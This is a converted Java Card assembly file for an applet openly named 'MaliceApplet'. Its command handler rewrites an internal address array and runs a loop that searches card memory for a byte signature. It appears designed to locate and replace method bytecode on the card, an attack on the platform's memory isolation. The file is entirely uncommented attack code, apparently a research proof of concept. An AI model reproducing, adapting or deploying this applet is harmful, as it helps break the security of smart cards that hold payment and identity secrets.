// converted by version 1.3
// on Mon Jul 02 11:45:58 CEST 2018

.package malicepackage {
	.aid 0x10:0x2:0x3:0x4:0x5:0x6:0x7:0x8:0x9:0x0;
	.version 1.0;

	.imports {
		0xA0:0x0:0x0:0x0:0x62:0x1:0x1 1.3;		//javacard/framework
		0xA0:0x0:0x0:0x0:0x62:0x0:0x1 1.0;		//java/lang
	}

	.applet {
		0x10:0x2:0x3:0x4:0x5:0x6:0x7:0x8:0x9:0x0:0x0 MaliceApplet;
	}

	.constantPool {
		// 0
		instanceFieldRef byte[] MaliceApplet/codeD;
		// 1
		instanceFieldRef byte[] MaliceApplet/searchBuf;
		// 2
		instanceFieldRef byte MaliceApplet/k;
		// 3
		staticMethodRef 0.3.0()V;		// javacard/framework/Applet.<init>()V
		// 4
		classRef MaliceApplet;
		// 5
		staticMethodRef MaliceApplet/<init>()V;
		// 6
		virtualMethodRef 0.3.1()V;		// register()V
		// 7
		virtualMethodRef 0.10.1()[B;		// getBuffer()[B
		// 8
		virtualMethodRef 0.3.3()Z;		// selectingApplet()Z
		// 9
		staticMethodRef 0.7.1(S)V;		// javacard/framework/ISOException.throwIt(S)V
		// 10
		virtualMethodRef MaliceApplet/getMyAdresstabByte([B)S;
		// 11
		staticMethodRef 0.16.6([BSS)S;		// javacard/framework/Util.setShort([BSS)S
		// 12
		virtualMethodRef 0.10.8(SS)V;		// setOutgoingAndSend(SS)V
		// 13
		virtualMethodRef 0.10.6()S;		// setIncomingAndReceive()S
		// 14
		staticMethodRef MaliceApplet/functionToReplace()S;
		// 15
		staticFieldRef byte[] MaliceApplet/find;
		// 16
		staticFieldRef byte MaliceApplet/ad;
	}

	.class public MaliceApplet 0 extends 0.3 {		// extends javacard/framework/Applet

		.fields {
			public byte k 0;		// B
			public byte[] codeD 1;		// [B
			public byte[] searchBuf 2;		// [B
			public static final byte CLA_MALICEAPPLET = -64;		// B
			public static final byte INS_INI_CODED = 0;		// B
			public static final byte INS_GETMYADRESSBYTE = 1;		// B
			public static final byte INS_MODIF_CODED = 2;		// B
			public static final byte INS_REPLACE = 10;		// B
			public static byte ad 0 = 5;		// B
			public static byte[] find 1 = {17,105,-126,-115,0,11};		// [B
		}

		.publicMethodTable 7 {
			equals(Ljava/lang/Object;)Z;
			register()V;
			register([BSB)V;
			selectingApplet()Z;
			deselect()V;
			getShareableInterfaceObject(Ljavacard/framework/AID;B)Ljavacard/framework/Shareable;;
			select()Z;
			process(Ljavacard/framework/APDU;)V;
			getMyAdresstabByte([B)S;
		}

		.packageMethodTable 0 {
		}

		.method private <init>()V {
			.stack 5;
			.locals 0;

				L0:	aload_0;
					invokespecial 3;		// javacard/framework/Applet.<init>()V
					aload_0;
					bspush 6;
					newarray 11;
					dup;
					sconst_0;
					sconst_1;
					bastore;
					dup;
					sconst_2;
					bspush 125;
					bastore;
					dup;
					sconst_5;
					bspush 120;
					bastore;
					putfield_a 0;		// reference malicepackage/MaliceApplet.codeD
					aload_0;
					bspush 6;
					newarray 11;
					putfield_a 1;		// reference malicepackage/MaliceApplet.searchBuf
					aload_0;
					sconst_0;
					putfield_b 2;		// byte malicepackage/MaliceApplet.k
					return;
		}

		.method public static install([BSB)V 0 {
			.stack 2;
			.locals 0;

				L0:	new 4;		// malicepackage/MaliceApplet
					dup;
					invokespecial 5;		// malicepackage/MaliceApplet.<init>()V
					invokevirtual 6;		// register()V
					return;
		}

		.method public process(Ljavacard/framework/APDU;)V 7 {
			.stack 4;
			.locals 2;

			.descriptor	Ljavacard/framework/APDU;	0.10;

				L0:	aload_1;
					invokevirtual 7;		// getBuffer()[B
					astore_2;
					aload_0;
					invokevirtual 8;		// selectingApplet()Z
					ifeq L2;
				L1:	return;
				L2:	aload_2;
					sconst_0;
					baload;
					bspush -64;
					if_scmpeq L4;
				L3:	sspush 28160;
					invokestatic 9;		// javacard/framework/ISOException.throwIt(S)V
				L4:	aload_2;
					sconst_1;
					baload;
					slookupswitch L18 4 0 L5 1 L6 2 L7 10 L8;
				L5:	getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					sconst_3;
					sconst_0;
					bastore;
					getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					sconst_4;
					sconst_0;
					bastore;
					goto_w L19;
				L6:	aload_2;
					sconst_0;
					aload_0;
					getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					invokevirtual 10;		// getMyAdresstabByte([B)S
					invokestatic 11;		// javacard/framework/Util.setShort([BSS)S
					pop;
					aload_1;
					sconst_0;
					sconst_3;
					invokevirtual 12;		// setOutgoingAndSend(SS)V
					goto_w L19;
				L7:	aload_1;
					invokevirtual 13;		// setIncomingAndReceive()S
					pop;
					getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					sconst_3;
					aload_2;
					sconst_5;
					baload;
					bastore;
					getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					sconst_4;
					aload_2;
					bspush 6;
					baload;
					bastore;
					goto L19;
				L8:	sconst_0;
					sstore_3;
					goto L16;
				L9:	getfield_a_this 1;		// reference malicepackage/MaliceApplet.searchBuf
					getfield_b_this 2;		// byte malicepackage/MaliceApplet.k
					invokestatic 14;		// malicepackage/MaliceApplet.functionToReplace()S
					invokestatic 11;		// javacard/framework/Util.setShort([BSS)S
					pop;
					getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					sconst_4;
					dup2;
					baload;
					sconst_1;
					sadd;
					s2b;
					bastore;
					getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					sconst_4;
					baload;
					ifne L11;
				L10:	getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					sconst_3;
					dup2;
					baload;
					sconst_1;
					sadd;
					s2b;
					bastore;
				L11:	getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					sconst_3;
					baload;
					getstatic_a 15;		// reference malicepackage/MaliceApplet.find
					getfield_b_this 2;		// byte malicepackage/MaliceApplet.k
					baload;
					if_scmpne L13;
				L12:	getfield_a_this 1;		// reference malicepackage/MaliceApplet.searchBuf
					getfield_b_this 2;		// byte malicepackage/MaliceApplet.k
					getfield_a_this 0;		// reference malicepackage/MaliceApplet.codeD
					sconst_3;
					baload;
					bastore;
					aload_0;
					dup;
					getfield_b 2;		// byte malicepackage/MaliceApplet.k
					sconst_1;
					sadd;
					s2b;
					putfield_b 2;		// byte malicepackage/MaliceApplet.k
					goto L15;
				L13:	getfield_b_this 2;		// byte malicepackage/MaliceApplet.k
					ifle L15;
				L14:	aload_0;
					sconst_0;
					putfield_b 2;		// byte malicepackage/MaliceApplet.k
				L15:	sinc 3 1;
				L16:	sload_3;
					sspush 10000;
					if_scmplt L9;
				L17:	goto L19;
				L18:	sspush 27904;
					invokestatic 9;		// javacard/framework/ISOException.throwIt(S)V
				L19:	return;
		}

		.method public getMyAdresstabByte([B)S 8 {
			.stack 3;
			.locals 1;

				L0:	sspush 4590;
					sstore_2;
					aload_1;
					sconst_0;
					sconst_m1;
					bastore;
					sload_2;
					sreturn;
		}

		.method public static functionToReplace()S 1 {
			.stack 1;
			.locals 0;

				L0:	getstatic_b 16;		// byte malicepackage/MaliceApplet.ad
					sreturn;
		}

	}

}
